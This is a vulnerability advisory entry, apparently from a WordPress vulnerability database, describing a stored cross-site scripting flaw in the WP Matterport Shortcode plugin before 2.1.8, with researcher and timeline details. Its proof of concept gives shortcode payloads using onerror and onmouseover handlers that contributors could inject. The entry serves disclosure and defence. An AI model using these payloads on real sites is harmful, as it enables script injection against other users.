WordPress Plugin Vulnerabilities
WP Matterport Shortcode < 2.1.8 - Contributor+ Stored XSS via shortcode
Description
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
Proof of Concept
As a contributor, put the following shortcodes in the page/post and view/preview it [matterport src="test" width='1 " onerror="alert(/XSS1/)'] [matterport src="test" window='"onmouseover=alert(/XSS2/)//'] (and move the mouse over the generated block to trigger the XSS) Other affected attributes: height, help, hl, qs, brand, lang, hhl, kb, lp, title, tourcta, maxzoom, minzoom, zoomtrans, mpv, filter, minimapfilter, copyright, ga, aa
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Dmitrii Ignatyev
Submitter
Dmitrii Ignatyev
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-09-25 (about 7 months ago)
Added
2023-09-25 (about 7 months ago)
Last Updated
2023-09-26 (about 7 months ago)